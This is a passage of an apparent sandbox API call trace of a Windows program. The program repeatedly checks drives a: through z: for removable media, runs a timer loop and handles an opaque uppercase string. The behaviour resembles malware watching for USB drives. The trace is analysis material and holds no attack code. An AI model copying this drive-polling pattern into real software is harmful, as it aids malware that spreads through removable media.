(HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0215.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0215.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0215.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0215.410] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0215.410] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0215.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.411] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.411] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0215.411] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0215.411] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0215.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0215.411] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.411] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0215.411] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0215.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0215.411] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0215.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0215.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.411] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0215.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0215.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0215.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.412] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.412] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.412] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.412] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.412] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.412] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.412] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.412] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.412] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.413] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.413] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.413] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.413] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.413] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.414] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.414] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.414] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.415] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.415] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.415] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.415] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.415] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.416] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.416] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.416] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.416] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.416] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0215.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0215.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.417] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0215.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fa0 [0215.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fa0 | out: hHeap=0x12c0000) returned 1 [0215.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0215.418] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0215.418] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0215.418] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0215.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.418] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.418] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.418] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.418] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.418] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.418] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.418] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.418] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0215.418] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.418] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.419] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.419] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.419] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.419] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.419] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.419] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.419] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.419] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.419] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0215.419] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.419] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.419] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.419] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.419] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.419] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.419] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.420] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.420] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.420] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.420] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.420] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.420] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.421] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.421] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.421] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.421] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.421] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.422] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.422] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.422] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.422] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.422] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.422] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.423] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.423] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.423] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.423] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.423] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.423] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.423] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.423] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.423] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.423] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.423] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.423] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.423] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0215.424] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.424] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.424] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.424] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.424] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.424] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.424] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.424] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.424] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.424] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.424] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.424] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0215.424] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325de0 [0215.424] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.425] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.425] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.425] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325de0 | out: hHeap=0x12c0000) returned 1 [0215.425] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.425] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.425] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0215.425] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.425] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0215.425] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.425] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0215.425] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.425] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.425] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.425] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.425] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.425] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0215.425] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.425] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.425] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.425] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0215.425] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.425] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.425] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.425] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.425] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.425] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.425] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.425] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0215.425] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0215.426] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.426] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.426] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.426] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.426] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.426] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.426] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.426] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.426] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.426] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0215.426] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0215.426] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0215.426] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.426] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.426] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.427] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.427] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.427] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.427] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.427] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.427] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.427] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.427] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.428] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.428] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.428] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.428] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.428] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.428] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.429] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.429] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.429] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.429] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.429] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.429] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.429] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.430] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.430] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.430] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.430] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0215.430] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.430] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.430] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.430] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.430] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.430] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.430] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0215.430] RtlAllocateHeap 